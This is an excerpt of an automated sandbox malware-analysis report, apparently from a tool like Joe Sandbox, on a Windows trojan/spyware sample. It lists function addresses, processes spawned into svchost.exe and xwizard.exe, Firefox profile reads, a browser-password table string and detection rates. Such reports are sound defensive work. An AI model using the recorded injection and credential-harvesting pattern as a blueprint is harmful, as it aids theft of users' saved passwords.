                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012402_2_00401240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416ADE2_2_00416ADE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032E02_2_004032E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AE32_2_00416AE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E2F32_2_0040E2F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103032_2_00410303
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4432_2_0040E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4382_2_0040E438
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DC02_2_00402DC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EF932_2_0042EF93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA3522_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F02_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037003E62_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E02742_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C02C02_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C81582_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036301002_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA1182_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81CC2_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F41A22_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037001AA2_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D20002_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036407702_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036647502_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C02_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6E02_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036405352_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037005912_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F24462_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E44202_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE4F62_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB402_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6BD72_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA802_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036569622_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A9A62_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A8402_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8F02_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268B82_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4F402_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03682F282_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660F302_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E2F302_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CFE02_2_0364CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632FC82_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BEFA02_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640E592_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEE262_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEEDB2_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652E902_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCE932_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AD002_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DCD1F2_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD22_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD52_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032AFBA18_2_032AFBA1
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032B1BB18_2_032B1BB1
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032B838C8_2_032B838C
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032B83918_2_032B8391
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032A61748_2_032A6174
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032BA1918_2_032BA191
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032B19918_2_032B1991
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032D08418_2_032D0841
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032AFCE68_2_032AFCE6
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032AFCF18_2_032AFCF1
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050405919_2_05040591
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050324469_2_05032446
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F805359_2_04F80535
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0502E4F69_2_0502E4F6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F9C6E09_2_04F9C6E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F7C7C09_2_04F7C7C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F807709_2_04F80770
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FA47509_2_04FA4750
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0501A1189_2_0501A118
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050081589_2_05008158
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050401AA9_2_050401AA
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050381CC9_2_050381CC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F701009_2_04F70100
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503A3529_2_0503A352
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050403E69_2_050403E6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F8E3F09_2_04F8E3F0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050202749_2_05020274
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050002C09_2_050002C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F70CF29_2_04F70CF2
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F80C009_2_04F80C00
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F7ADE09_2_04F7ADE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F98DBF9_2_04F98DBF
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_05020CB59_2_05020CB5
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F8AD009_2_04F8AD00
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F92E909_2_04F92E90
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F80E599_2_04F80E59
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F8CFE09_2_04F8CFE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503EE269_2_0503EE26
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F72FC89_2_04F72FC8
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FFEFA09_2_04FFEFA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503CE939_2_0503CE93
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FF4F409_2_04FF4F40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FA0F309_2_04FA0F30
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FC2F289_2_04FC2F28
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503EEDB9_2_0503EEDB
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FAE8F09_2_04FAE8F0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F668B89_2_04F668B8
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0504A9A69_2_0504A9A6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F8A8409_2_04F8A840
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F969629_2_04F96962
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503AB409_2_0503AB40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F7EA809_2_04F7EA80
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_05036BD79_2_05036BD7
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050375719_2_05037571
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F714609_2_04F71460
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0501D5B09_2_0501D5B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503F43F9_2_0503F43F
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503F7B09_2_0503F7B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050316CC9_2_050316CC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0504B16B9_2_0504B16B
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F8B1B09_2_04F8B1B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F6F1729_2_04F6F172
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FB516C9_2_04FB516C
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0502F0CC9_2_0502F0CC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503F0E09_2_0503F0E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050370E99_2_050370E9
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503132D9_2_0503132D
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F9B2C09_2_04F9B2C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F852A09_2_04F852A0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FC739A9_2_04FC739A
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F6D34C9_2_04F6D34C
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_050212ED9_2_050212ED
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_05031D5A9_2_05031D5A
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_05037D739_2_05037D73
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FF9C329_2_04FF9C32
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F9FDC09_2_04F9FDC0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F83D409_2_04F83D40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503FCF29_2_0503FCF2
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503FF099_2_0503FF09
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F89EB09_2_04F89EB0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503FFB19_2_0503FFB1
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F43FD59_2_04F43FD5
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F43FD29_2_04F43FD2
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F81F929_2_04F81F92
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F838E09_2_04F838E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FED8009_2_04FED800
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F899509_2_04F89950
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F9B9509_2_04F9B950
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FC5AA09_2_04FC5AA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503FB769_2_0503FB76
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FF3A6C9_2_04FF3A6C
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FBDBF99_2_04FBDBF9
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04FF5BF09_2_04FF5BF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_05037A469_2_05037A46
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0503FA499_2_0503FA49
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F9FB809_2_04F9FB80
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_0502DAC69_2_0502DAC6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CC1CF09_2_00CC1CF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CC53909_2_00CC5390
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CB13739_2_00CB1373
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CC358B9_2_00CC358B
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CC35909_2_00CC3590
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CD065F9_2_00CD065F
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CDBA409_2_00CDBA40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CBCB909_2_00CBCB90
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CBADA09_2_00CBADA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CBCDB09_2_00CBCDB0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CBAEE59_2_00CBAEE5
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CBAEF09_2_00CBAEF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04CDE6A99_2_04CDE6A9
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04CDE2849_2_04CDE284
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04CD020F9_2_04CD020F
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04CDE3A39_2_04CDE3A3
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04CDD8089_2_04CDD808
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04CDCAB39_2_04CDCAB3
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04FEEA12 appears 86 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04FC7E54 appears 97 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04F6B970 appears 242 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04FB5130 appears 36 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04FFF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 250 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 110 times
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: String function: 00650D27 appears 70 times
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: String function: 00637F41 appears 35 times
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: String function: 00658B40 appears 42 times
                Source: 1YDqrpKZwA.exe, 00000000.00000003.1242048665.0000000003A93000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1YDqrpKZwA.exe
                Source: 1YDqrpKZwA.exe, 00000000.00000003.1241410578.0000000003C3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1YDqrpKZwA.exe
                Source: 1YDqrpKZwA.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@12/8
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069A2D5 GetLastError,FormatMessageW,0_2_0069A2D5
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00688713 AdjustTokenPrivileges,CloseHandle,0_2_00688713
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00688CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00688CC3
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0069B59E
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006AF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_006AF121
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069C602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0069C602
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00634FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00634FE9
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeFile created: C:\Users\user\AppData\Local\Temp\autE6B6.tmpJump to behavior
                Source: 1YDqrpKZwA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: xwizard.exe, 00000009.00000003.1648997283.00000000033C2000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3089303575.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000003.1648557817.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3089303575.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3089303575.00000000033C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 1YDqrpKZwA.exeVirustotal: Detection: 69%
                Source: 1YDqrpKZwA.exeReversingLabs: Detection: 81%
                Source: unknownProcess created: C:\Users\user\Desktop\1YDqrpKZwA.exe "C:\Users\user\Desktop\1YDqrpKZwA.exe"
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1YDqrpKZwA.exe"
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
                Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1YDqrpKZwA.exe"Jump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: iertutil.dllJump to behavior
